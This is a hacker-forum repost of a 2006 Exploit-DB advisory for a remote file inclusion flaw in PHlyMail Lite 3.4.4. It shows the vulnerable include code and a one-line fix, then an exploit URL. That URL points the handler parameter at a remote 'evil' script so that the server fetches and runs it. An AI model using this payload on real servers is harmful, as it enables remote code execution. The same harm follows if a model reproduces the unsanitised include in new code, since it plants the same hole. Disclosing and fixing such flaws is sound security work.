Exploit PHlyMail Lite 3.4.4 - 'mod.listmail.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2211
Проверка EDB
  1. Пройдено
Автор
KACPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4291
Дата публикации
2006-08-18
Код:
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: PHlyMail Lite v. 3.4.4 (Build 3.04.04)
- [Script site: http://phlymail.de/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: [email protected]
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne kozysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
+++++++++++++++++++++START+++++++++++++++++++++++
vulnerable code => handlers/email/mod.listmail.php line 12-25:
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) && $_PM_['core']['folders_usepreview']) ? true : false;

$ordfields = array
       ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority'
       ,'attachments', 'meta_read', 'meta_type', 'meta_colour'
       );
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');

// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
       && $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
   $_SESSION['WPs_pagenum'] = 0;
}
....
+++++++++++++++++++++++++++++++++++++++++++++++++
*/
/*
+++++++++++++++++++++FIX+++++++++++++++++++++++++
handlers/email/mod.listmail.php line 12-25:
Add Line1:
....
if (!defined('_IN_PHM_')) die();
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) &&
$_PM_['core']['folders_usepreview']) ? true : false;

$ordfields = array
       ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority'
       ,'attachments', 'meta_read', 'meta_type', 'meta_colour'
       );
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');

// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
       && $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
   $_SESSION['WPs_pagenum'] = 0;
}
....
++++++++++++++++++++THE+END++++++++++++++++++++++
*/
#Exploit:

http://www.site.com/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]

# milw0rm.com [2006-08-18]
 
Источник
www.exploit-db.com

Похожие темы